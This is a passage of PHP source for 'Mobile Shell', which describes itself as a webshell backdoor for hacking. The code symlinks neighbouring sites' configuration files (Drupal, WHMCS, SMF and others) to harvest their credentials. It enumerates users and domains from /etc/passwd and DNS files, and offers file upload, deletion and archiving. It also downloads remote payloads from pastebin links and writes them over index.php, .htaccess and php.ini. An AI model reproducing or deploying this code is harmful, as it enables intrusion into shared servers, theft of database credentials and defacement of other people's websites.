- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/Settings.php',"pee/".$ms_1[0].'-SMF.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/sites/default/settings.php',"pee/".$ms_1[0].'-Drupal.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/e107_config.php',"pee/".$ms_1[0].'-e107.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/datas/config.php',"pee/".$ms_1[0].'-Seditio.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/includes/configure.php',"pee/".$ms_1[0].'-osCommerce.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/client/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientes/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/support/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/supportes/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmcs/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domain/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/hosting/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/whmc/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/billing/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/portal/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/order/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/clientarea/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt');
- symlink('/'.$dr[1].'/'.$ms_1[0].'/'.$dr[3].'/domains/configuration.php',"pee/".$ms_1[0].'-WHMCS.txt'); }
- }
- elseif(isset($_REQUEST['symlink'])){
- switch ($_REQUEST['symlink']){
- case 'var':
- if(is_readable("/var/named")){
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYMLINK [ VAR/NAMED ]</td></table></div>';
- echo '<table class="table-info">';
- echo '
- <th class="th-info">Website</th>
- <th class="th-info" style="width:60px">User</th>
- <th class="th-info" style="width:40px">Action</th>';
- $ms_5 = scandir("/var/named");
- foreach($ms_5 as $ms_6){
- if(strpos($ms_6,".db")){
- $i += 1;
- $ms_6 = str_replace('.db','',$ms_6);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$ms_6));
- echo "<tr class='ex-hov'>
- <td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$ms_6." '>".$ms_6."</a></td>
- <td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td>
- <td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
- }
- }
- echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
- Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
- }else{ echo "<tr><td class='td-info'>can't read [ /var/named ]</td></table>";
- }
- break;
- }
- switch ($_REQUEST['symlink']){
- case 'passwd':
- error_reporting(0);
- $etc = file_get_contents("/etc/passwd");
- $etcz = explode("\n",$etc);
- if(is_readable("/etc/passwd")){
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYMLINK [ ETC/PASSWD ]</td></table></div>';
- echo '<table class="table-info">';
- echo '
- <th class="th-info">Website</th>
- <th class="th-info" style="width:60px">User</th>
- <th class="th-info" style="width:40px">Action</th>';
- $list = scandir("/var/named");
- foreach($etcz as $etz){
- $etcc = explode(":",$etz);
- foreach($list as $domain){
- if(strpos($domain,".db")){
- $domain = str_replace('.db','',$domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- if($owner['name'] == $etcc[0]) {
- $i += 1;
- echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain." '>".$domain."</a></td>
- <td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td>
- <td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
- }}}}
- echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
- Total Domain : <font color='#1D9D73'>".$i."</font> </div>";}
- break;
- }
- switch ($_REQUEST['symlink']){
- case 'named.conf':
- if(is_readable("/etc/named.conf")){
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYMLINK [ ETC/NAMED.CONF ]</td></table></div>';
- echo '<table class="table-info">';
- echo '
- <th class="th-info">Website</th>
- <th class="th-info" style="width:60px">User</th>
- <th class="th-info" style="width:40px">Action</th>';
- $named = file_get_contents("/etc/named.conf");
- preg_match_all('%zone \"(.*)\" {%',$named,$domains);
- foreach($domains[1] as $domain){
- $domain = trim($domain);
- $i += 1;
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain." '>".$domain."</a></td><td class='td-info'><center><font color='#1D9D73'>".$owner['name']."</font></center></td><td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
- }
- echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
- Total Domain : <font color='#1D9D73'>".$i."</font> </div>";
- } else { echo "<tr><td class='td-info'>can't read [ /etc/named.conf ]</td></tr>"; }
- break;
- }
- switch ($_REQUEST['symlink']){
- case 'valiases':
- if(is_readable("/etc/valiases")){
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYMLINK [ ETC/VALIASES ]</td></table></div>';
- echo '<table class="table-info">';
- echo '
- <th class="th-info">Website</th>
- <th class="th-info" style="width:60px">User</th>
- <th class="th-info" style="width:40px">Action</th>';
- $list = scandir("/etc/valiases");
- foreach($list as $domain){
- $i += 1;
- $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
- echo "<tr class='ex-hov'><td class='td-info break'> <span class='label-default'>+</span> <a href='http://".$domain."'>".$domain."</a></td><center><td class='td-info'><font color='#1D9D73'>".$owner['name']."</font></center></td><td class='td-info'><center><a href='pee/root".$owner['dir']."/".$dr[3]."' target='_blank'>OPEN</a></center></td>";
- }
- echo "</table><div class='coL-option' style='padding:7px;margin-top:3px'>
- Total Domain : <font color='#1D9D73'>".$i."</font></div>";
- } else { echo "<tr><td class='td-info'>can't read [ /etc/valiases ]</td></tr>"; }
- break;
- }
- }
- // --- change password --- //
- elseif($_COEG['command'] == 'change') {
- echo('<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CHANGE PASSWORD</td></table></div>');
- echo('<script>
- function validate(){
- var a = document.getElementById("newpass").value;
- var b = document.getElementById("confirm").value;
- if (a!=b) {
- $.alert({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- content: "Password Do Not Match !!",
- theme: "Dark",
- type: "red",
- });
- return false;
- }
- }
- </script>');
- function xs($file){
- return file_get_contents($file);
- }
- function chipt($plain){
- return md5($plain);
- }
- function changepass($plain){
- $npass = chipt($plain);
- $npass = "\$pass = \"".$npass."\";";
- $con = xs($_SERVER['SCRIPT_FILENAME']);
- $con = preg_replace("/\\\$pass\ *=\ *[\"\']*([a-fA-F0-9]*)[\"\']*;/is",$npass,$con);
- return file_put_contents($_SERVER['SCRIPT_FILENAME'], $con);
- }
- if($_COEG['newpass']) {
- if(changepass($_COEG['newpass'])) {
- $q1 = 'Password Changed !!';
- $t1 = '?'.x5.$dir.'&'.x7.'logout';
- fauto2($q1, $t1);
- } else { $alert = "Can't Change Password !!";
- failed1($alert);
- }
- }
- echo "<div class='coL-option top'>
- <form method='post' onSubmit='return validate();' action='?".x7."change&".x5.$dir."'><table style='width:100%'>
- <td style='width:120px'>Password :</td><td style='width:75%'><input type='password' id='newpass' name='newpass' style='width:100%'></td>
- <tr>
- <td style='width:120px'>Confirm :</td><td style='width:75%'><input type='password' id='confirm' name='confirm' style='width:100%'></td>
- <tr>
- <td style='width:120px'></td><td style='width:75%'>
- <input type='submit' name='cps' class='btn-exe' value='Save' onclick='saveForm();return false;' style='width:100px'></td></table></form></div>";
- echo '<script>function saveForm(){
- if(document.getElementById("newpass").value == ""){
- $.alert({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- content: "Enter New Password !!",
- theme: "Dark",
- type: "red",
- });
- document.getElementById("newpass").focus();
- return false;
- }
- if(document.getElementById("confirm").value == ""){
- $.alert({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- content: "Confirm Your Password !!",
- theme: "Dark",
- type: "red",
- });
- return false;
- }
- document.getElementById("sks").submit();
- }
- </script>';
- }
- // --- kill me --- //
- elseif($_COEG['command'] == 'kill') {
- if(file_exists("MOBILE_SHELL.php"))
- unlink("MOBILE_SHELL.php");unlink(__FILE__);
- $q1 = "Good By Baby :'(";
- $t1 = "http://underxploit.blogspot.com";
- fauto2($q1, $t1);
- }
- // --- about me --- //
- elseif($_COEG['command'] == 'about') {
- echo '<div class="coL-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">DESCRIPTION</td></table></div>';
- echo '<div class="coL-option" style="padding:7px">
- Mobile Shell is a shell script backdoor / webshell that I designed specifically for mobile users, you can use this script for hacking activities or just to FileManager for your website.
- <br><br>
- Unlike the other shell is created for PC users if used via mobile phones will be very difficult.
- <br><br>
- The advantages of this script is very easy and more comfortable when in use via mobile phone (Responsive), plus the script is very light.</div>
- <div class="coL-panel top"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MEANING OF SYMBOL [ ICON ]</td></table></div>
- <table class="table-info">
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info"><i class="fa fa-eye"></i></td> <td class="td-info">: View Source</td>
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info"><i class="fa fa-pencil"></i></td> <td class="td-info">: Edit Source</td>
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info"><i class="fa fa-edit"></i></td> <td class="td-info">: Change Name [ Rename ]</td>
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info"><i class="fa fa-cogs"></i></td> <td class="td-info">: Chmod [ Change Permission ]</td>
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info"><i class="fa fa-trash"></i></td> <td class="td-info">: Delete</td>
- </table>
- <div class="coL-panel top"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MEANING OF SYMBOL [ ALPHABET ]</td></table></div>
- <table class="table-info"><tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info">[ U ]</td> <td class="td-info">: Upload [ In Directory ]</td>
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info">[ R ]</td> <td class="td-info">: Rename</td>
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info">[ D ]</td> <td class="td-info">: Delete</td>
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info">[ ND ]</td> <td class="td-info">: Create New Directory</td>
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info">[ NF ]</td> <td class="td-info">: Create New File</td>
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info">[ OPEN ]</td> <td class="td-info">: Open Properties</td>
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info">[ COPY ]</td> <td class="td-info">: Copy File / Directory</td>
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info">[ MOVE ]</td> <td class="td-info">: Move File / Directory</td>
- <tr class="ex-hov">
- <td style="width:85px" align="center" class="td-info">[ DELETE ]</td> <td class="td-info">: Delete File / Directory</td>
- </table>
- <div class="coL-panel top"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CREDITS</td></table></div>
- <table class="table-info">
- <tr class="ex-hov">
- <td style="width:85px" class="td-info"><span class="label label-default">+</span> Name</td> <td class="td-info">: Mobile Shell</td>
- <tr class="ex-hov">
- <td style="width:85px" class="td-info"><span class="label label-default">+</span> Version</td> <td class="td-info">: 0.5 [ 4th Edition ]</td>
- <tr class="ex-hov">
- <td style="width:85px" class="td-info"><span class="label label-default">+</span> Author</td> <td class="td-info">: Wildan Izzudin</td>
- <tr class="ex-hov">
- <td style="width:85px" class="td-info"><span class="label label-default">+</span> Email</td> <td class="td-info break">: <a class="a" href="mailto:[email protected]">[email protected]</a></td>
- <tr class="ex-hov">
- <td style="width:85px" class="td-info"><span class="label label-default">+</span> Facebook</td> <td class="td-info break">: <a class="a" href="http://www.facebook.com/WILDAN.OFFICIAL">http://fb.me/WILDAN.OFFICIAL</a></td>
- <tr class="ex-hov">
- <td style="width:85px" class="td-info"><span class="label label-default">+</span> Blog</td> <td class="td-info">: <a class="a" href="http://underxploit.blogspot.co.id">http://underxploit.blogspot.co.id</a></td></table>
- <div class="coL-option to">
- <center><br>If there is any suggestion or feedback please contact me through the contact above.<br><br><center><br>— Thank You —</center></div>';
- }
- // --- logout --- //
- elseif ($_COEG['command'] == 'logout') {
- r($_SERVER['PHP_SELF']);
- setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600);
- }
- // --- mass action --- //
- else {
- $hc = @getcwd();
- if(isset($_COEG['location']))
- @chdir($_COEG['location']);
- $cwd = @getcwd();
- if($os == 'win') {
- $hc = str_replace("\\", "/", $hc);
- $cwd = str_replace("\\", "/", $cwd);
- }
- if($cwd[strlen($cwd)-1] != '/')
- $cwd .= '/';
- function hs($d) {
- if(function_exists("scandir")) {
- return scandir($d);
- } else {
- $dh = opendir($d);
- while (false !== ($filename = readdir($dh)))
- $data[] = $filename;
- return $data;
- }
- }
- if(!empty($_COOKIE['msv5']))
- $_COOKIE['msv5'] = @unserialize($_COOKIE['msv5']);
- if(!empty($_COEG['hcx'])) {
- switch($_COEG['hcx']) {
- case 'mkdir':
- if(!@mkdir($_COEG['p2']))
- echo "Can't create new dir";
- break;
- case 'delete':
- function deleteDir($path) {
- $path = (substr($path,-1)=='/') ? $path:$path.'/';
- $dh = opendir($path);
- while ( ($r = readdir($dh) ) !== false) {
- $r = $path.$r;
- if ( (basename($r) == "..") || (basename($r) == ".") )
- continue;
- $type = filetype($r);
- if ($type == "dir")
- deleteDir($r);
- else
- @unlink($r);
- }
- closedir($dh);
- @rmdir($path);
- }
- if(is_array(@$_COEG['msv5']))
- foreach($_COEG['msv5'] as $f) {
- if($f == '..')
- continue;
- $f = urldecode($f);
- if(is_dir($f))
- deleteDir($f);
- else
- @unlink($f);
- }
- break;
- case 'paste':
- if($_COOKIE['act'] == 'copy') {
- function copy_paste($c,$s,$d){
- if(is_dir($c.$s)){
- mkdir($d.$s);
- $h = @opendir($c.$s);
- while (($f = @readdir($h)) !== false)
- if (($f != ".") and ($f != ".."))
- copy_paste($c.$s.'/',$f, $d.$s.'/');
- } elseif(is_file($c.$s))
- @copy($c.$s, $d.$s);
- }
- foreach($_COOKIE['msv5'] as $f)
- copy_paste($_COOKIE['location'],$f, $GLOBALS['cwd']);
- } elseif($_COOKIE['act'] == 'move') {
- function move_paste($c,$s,$d){
- if(is_dir($c.$s)){
- mkdir($d.$s);
- $h = @opendir($c.$s);
- while (($f = @readdir($h)) !== false)
- if (($f != ".") and ($f != ".."))
- copy_paste($c.$s.'/',$f, $d.$s.'/');
- } elseif(@is_file($c.$s))
- @copy($c.$s, $d.$s);
- }
- foreach($_COOKIE['msv5'] as $f)
- @rename($_COOKIE['location'].$f, $GLOBALS['cwd'].$f);
- } elseif($_COOKIE['act'] == 'zip') {
- if(class_exists('ZipArchive')) {
- $zip = new ZipArchive();
- if ($zip->open($_COEG['p2'], 1)) {
- chdir($_COOKIE['location']);
- foreach($_COOKIE['msv5'] as $f) {
- if($f == '..')
- continue;
- if(@is_file($_COOKIE['location'].$f))
- $zip->addFile($_COOKIE['location'].$f, $f);
- elseif(@is_dir($_COOKIE['location'].$f)) {
- $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
- foreach ($iterator as $key=>$value) {
- $zip->addFile(realpath($key), $key);
- }
- }
- }
- chdir($GLOBALS['cwd']);
- $zip->close();
- }
- }
- } elseif($_COOKIE['act'] == 'unzip') {
- if(class_exists('ZipArchive')) {
- $zip = new ZipArchive();
- foreach($_COOKIE['msv5'] as $f) {
- if($zip->open($_COOKIE['location'].$f)) {
- $zip->extractTo($GLOBALS['cwd']);
- $zip->close();
- }
- }
- }
- } elseif($_COOKIE['act'] == 'tar') {
- chdir($_COOKIE['location']);
- $_COOKIE['msv5'] = array_map('escapeshellarg', $_COOKIE['msv5']);
- ex('tar cfzv ' . escapeshellarg($_COEG['p2']) . ' ' . implode(' ', $_COOKIE['msv5']));
- chdir($GLOBALS['cwd']);
- }
- unset($_COOKIE['msv5']);
- setcookie('msv5', '', time() - 3600);
- break;
- default:
- if(!empty($_COEG['hcx'])) {
- vb('act', $_COEG['hcx']);
- vb('msv5', serialize(@$_COEG['msv5']));
- vb('location', @$_COEG['location']);
- }
- break;
- }
- }
- echo('<script>function m1s(){
- if(document.getElementById("act").value == ""){
- $.alert ({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- content: "Select Action !!",
- theme: "Dark",
- type: "red",
- });
- return false;
- }
- document.getElementById("sks").submit();
- }
- </script>');
- echo('<form name="data" action="?dir='.$dir.'" method="POST" style="margin:0px">');
- echo('<div class="coL-panel"><table><td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">FILE MANAGER</td></table></div>');
- $dirContent = hs(isset($_COEG['location'])?$_COEG['location']:$GLOBALS['cwd']);
- if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; }
- global $sort;
- $sort = array('name', 1);
- if(!empty($_COEG['hcx'])) {
- if(preg_match('!s_([A-z]+)_(\d{1})!', $_COEG['hcx'], $match))
- $sort = array($match[1], (int)$match[2]);
- }
- echo('<script language="JavaScript">
- function toggle(source) {
- checkboxes = document.getElementsByName("msv5[]");
- for(var i=0, n=checkboxes.length;i<n;i++) {
- checkboxes[i].checked = source.checked;
- }
- }
- </script>');
- echo('<table class="table-file" cellspacing="0">
- <th class="th-file">Name</th>
- <th class="th-file" style="width:80px">Size</th>
- <th class="th-file" style="width:65px">Action</th>
- <th class="th-file"></th>
- <tr>');
- $dir = getcwd();
- $scn = scandir($dir);
- foreach($scn as $dirx) {
- $dtype = filetype("$dir/$dirx");
- if(!is_dir("$dir/$dirx")) continue;
- if($dirx === '..') {
- $href = '<a class="a" href="?'.x5.dirname($dir).'">'.$dirx.'</a>';
- }
- elseif($dirx === '.') {
- $href = '<a class="a" href="?'.x5.$dir.'">'.$dirx.'</a>';
- } else {
- $href = '<a class="a" href="?dir='.$dir.'/'.$dirx.'">'.$dirx.'</a>';
- }
- if($dirx === '.' || $dirx === '..') {
- $d_zx = "<font color='#FF0000'>——</font>";
- $ckh = '<input type="checkbox" disabled>';
- } else {
- $d_zx = "<a class='a' href='?command=upload&dir=$dir/$dirx'>U</a> |
- <a class='a' href='?command=renadir&dir=$dir/$dirx'>R</a> | <a class='a' href='?command=deledir&dir=$dir/$dirx'>D</a>";
- $ckh = '<input type="checkbox" value="'.basename($dirx).'" name="msv5[]">';
- }
- echo "<tr class='ex-hov'>";
- echo "<td class='td-file break'><i class='fa fa-folder-o'></i> [ $href
- ]</td>";
- echo "<td align='center' class='td-file'><center>——</center></th>";
- echo "<td align='center' class='td-file'>$d_zx</td>";
- echo "<td align='center' class='td-file' style='width:10px'>".$ckh."</td>";
- }
- echo "</tr>";
- foreach($scn as $file) {
- $ftype = filetype("$dir/$file");
- $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
- $size = filesize("$dir/$file")/1024;
- $size = round($size,3);
- if($size > 1024) {
- $size = round($size/1024,2). 'MB';
- } else {
- $size = $size. 'KB';
- }
- if(!is_file("$dir/$file")) continue;
- echo "<tr class='ex-hov'>";
- echo '<td class=\'td-file break\'><i class="fa fa-file-o"></i> <a class="a" href="?'.x7.'view&'.x5.$dir.'&'.x6.$dir.'/'.$file.'">'.$file.'</a></td>';
- echo "<td align='center' class='td-file'>$size</td>";
- echo "<td align='center' class='td-file'>";
- echo '<a class="a" href="?command=edit&dir='.$dir.'&file='.$dir.'/'.$file.'">OPEN</a></td>';
- echo "<td align='center' class='td-file' style='width:10px'><input type='checkbox' name='msv5[]' value='".$file."'> </td>";
- }
- echo "</table><table style='width:100%;margin-top:2px' cellspacing='0'>
- <td style='width:10%;text-align:left;padding-left:7px'><input type=checkbox onClick=toggle(this)></td>
- <input type=hidden name=ne value=''>
- <input type=hidden name=location value='" . htmlspecialchars($GLOBALS['cwd']) . "'>
- <input type=hidden name=charset value='". (isset($_COEG['charset'])?$_COEG['charset']:'')."'>
- <td style='width:70%'><select name='hcx' style='width:100%' id='act'>";
- if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']))
- echo("<option value='paste'>Paste</option>");
- echo("<option value=''>—— Select Action ——</option><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>");
- if(class_exists('ZipArchive'))
- echo("<option value='zip'>Compress (.zip)</option>");
- echo("</select></td>");
- if(!empty($_COOKIE['act']) && @count($_COOKIE['msv5']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
- echo("<input class='top' type=text name=p2 value='".rand(0,100)."-" . date("Y-m-d") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>");
- echo "<td style='width:20%;text-align:right'><input type='submit' onclick='m1s(); return false;' value='GO' class='btn-exe'></td></form></table>";
- if(isset($_COEG['ndir'])) {
- $cdir = $_COEG['newinput'];
- if (is_dir($dir.'/'.$cdir)) {
- $q1 = 'Directory Already Exist !!';
- echo failed1($q1);
- } else {
- if(mkdir($dir.'/'.$cdir, 0777)) {
- $q1 = 'Directory Created ^_^';
- echo success1($q1);
- echo "<meta http-equiv='Refresh' content='0; URL=?dir=".$dir."'/>";
- } else {
- $q1 = 'Can\'t Create Directory !!';
- echo failed1($q1); } } }
- if(isset($_COEG['nfil'])) {
- $cfile = $_COEG['newinput'];
- if (file_exists($dir.'/'.$cfile)) {
- $q1 = "File Already Exist !!";
- echo failed1($q1);
- } else {
- if(fopen($dir.'/'.$cfile, "w+")) {
- echo "<meta http-equiv='Refresh' content='0; URL=?command=edit&dir=".$dir."&file=".$dir."/".$cfile."'/>";
- } else {
- $q1 = 'Can\'t Create File !!';
- echo failed1($q1);
- }
- }
- }
- echo('<script language="Javascript">
- function cog(){
- if(document.forms[\'new\'].newinput.value === "") { $.alert({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- content: "Can\'t Be Empty !!",
- theme: "Dark",
- type: "red",
- });
- return false;
- }
- }
- </script>');
- echo('<script type="text/javascript">
- function valid(field) {
- var re = /^[0-9-A-z.]*$/;
- if (!re.test(field.value)) {');
- $s = "Invalid Name !!";
- echo failed2($s);
- echo('field.value = field.value.replace(/[^0-9-A-z.]/g,"");
- }
- }
- </script>');
- echo('<table style="margin-top:3px" cellspacing="0"><form name="new" action="?'.x5.$dir.'" method="post">
- <td>
- <input type="text" name="newinput" onkeyup="valid(this);"></td>
- <td><input type="submit" class="btn-exe" name="ndir" onclick="return cog();" value="ND"></td>
- <td><input type="submit" class="btn-exe" name="nfil" onclick="return cog();" value="NF"></td></form></table>');
- }
- echo '<hr></div>';
- echo '<div class="coR">
- <div class="coR-panel"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">TOOLS</td></table></div>
- <div class="tools-content" style="padding:5px">';
- $path = getcwd();
- if(isset($_FILES['data'])) {
- if(copy($_FILES['data']['tmp_name'],$path.'/'.$_FILES['data']['name'])) {
- $q1 = 'File Uploaded !!';
- $t1 = '?'.x5.$dir;
- fauto2($q1, $t1);
- } else {
- $q1 = 'Upload Failed !!';
- failed1($q1);
- }
- }
- echo '<script>function upload(){
- if(document.getElementById("up").value == ""){
- $.alert ({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- content: "Select Your File !!",
- theme: "Dark",
- type: "red",
- });
- return false;
- }
- document.getElementById("%").submit();
- }
- </script>';
- echo '<table><td align="center" style="width:10%"><i class="fa fa-bookmark-o"></i></td><td style="width:70%"><form enctype="multipart/form-data" action="?'.x5.$dir.'" method="POST"><input type="file" name="data" id="up"></td><td style="width:20%"><button type="submit" class="btn-exe" onclick="upload();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
- echo '<hr>';
- if(isset($_COEG['x'])) {
- $rse = $_COEG['file_name'];
- $zip = new ZipArchive ;
- if($zip ->open($path.'/'.$rse) === TRUE) {
- $zip ->extractTo($path);
- $zip ->close();
- $q1 = '[ '.$rse.' ] Extracted !!';
- $t1 = '?'.x5.$dir;
- fauto2($q1, $t1);
- } else {
- $q1 = 'Permission Denied !!';
- failed1($q1);
- }
- }
- echo '<script>function unzip(){
- if(document.getElementById("u").value == ""){
- $.alert ({
- icon: "fa fa-code",
- title: "MOBILE SHELL",
- content: "Select Archive File [ .zip] !!",
- theme: "Dark",
- type: "red",
- });
- return false;
- }
- document.getElementById("sks").submit();
- }
- </script>';
- echo '<table>
- <form method="POST" action="?'.x5.$dir.'">
- <td align="center" style="width:10%"><i class="fa fa-bookmark-o"></i></td>
- <td style="width:70%"><select name="file_name" id="u">
- <option value=""> —— Choose File ——</option>';
- $scandir = scandir($path);
- foreach($scandir as $file){
- if(!is_file("$path/$file")) continue;
- if(preg_match('/\.zip$/mis',$file)) {
- echo '<option>'.$file.'</option>';
- }
- }
- echo '</select></td><td style="width:20%;text-align:right"><button type="submit" name="x" class="btn-exe" onclick="unzip();return false;"><i class="fa fa-arrow-circle-right"></i></button></form></td></table>';
- if($_COEG['ms_cr']=="0") {
- $alert = 'What Are You Doing Men ?';
- failed1($alert);
- }
- if($_COEG['ms_cr']=="1") {
- $rz = 'https://pastebin.com/raw/bC5Yx72V';
- $x = file_get_contents($rz);
- if(empty($x)) {
- $q1 = 'Can\'t Create File !!';
- failed1($q1); } else {
- $q1 = 'File Created !!';
- $t1 = '?'.x5.$dir;
- $t1 = '?'.x5.$dir;
- fauto2($q1, $t1);
- $fp = fopen($dir."/index.php", "w");
- fwrite($fp, $x);
- fclose($fp);
- }
- }
- if($_COEG['ms_cr']=="2") {
- $rz = 'http://pastebin.com/raw/156wCF33';
- $x = file_get_contents($rz);
- if(empty($x)) {
- $q1 = 'Can\'t Create File !!';
- failed1($q1); } else {
- $q1 = 'File Created !!';
- $t1 = '?'.x5.$dir;
- fauto2($q1, $t1);
- fauto2($q1, $t1);
- $fp = fopen($dir."/x.php", "w");
- fwrite($fp, $x);
- fclose($fp);
- }
- }
- if($_COEG['ms_cr']=="3") {
- $rz = x4.'/adminer.txt';
- $x = file_get_contents($rz);
- if(empty($x)) {
- $q1 = 'Can\'t Create File !!';
- failed1($q1); } else {
- $q1 = 'File Created !!';
- $t1 = '?'.x5.$dir;
- fauto2($q1, $t1);
- $fp = fopen($dir."/adminer.php", "w");
- fwrite($fp, $x);
- fclose($fp);
- }
- }
- if($_COEG['ms_cr']=="4") {
- $rz = 'http://pastebin.com/raw/fRyCn3bQ';
- $x = file_get_contents($rz);
- if(empty($x)) {
- $q1 = 'Can\'t Create File !!';
- failed1($q1); } else {
- $q1 = 'File Created !!';
- $t1 = '?'.x5.$dir;
- fauto2($q1, $t1);
- $fp = fopen($dir."/.htaccess", "w");
- fwrite($fp, $x);
- fclose($fp);
- }
- }
- if($_COEG['ms_cr']=="5") {
- $rz = 'http://pastebin.com/raw/gnbXUciS';
- $x = file_get_contents($rz);
- if(empty($x)) {
- $q1 = 'Can\'t Create File !!';
- failed1($q1); } else {
- $q1 = 'File Created !!';
- $t1 = '?'.x5.$dir;
- fauto2($q1, $t1);
- $fp = fopen($dir."/php.ini", "w");
- fwrite($fp, $x);
- fclose($fp);
- }
- }
- echo '</div>';
- echo('<div class="coR-panel top"><table>
- <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MENU</td></table></div>
- <div class="tools-content">');
- echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">System Information</td><td class="td-tools-icon"><a href="?'.x7.'system&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
- echo('<table class="ex-hov"><td class="td-tools-left"><i class="fa fa-angle-right"></i></td><td class="td-tools-content">Multiple Upload</td><td class="td-tools-icon"><a href="?'.x7.'upload&'.x5.$dir.'"><button class="btn-exe"><i class="fa fa-arrow-circle-right"></i></button></a></td></table>');
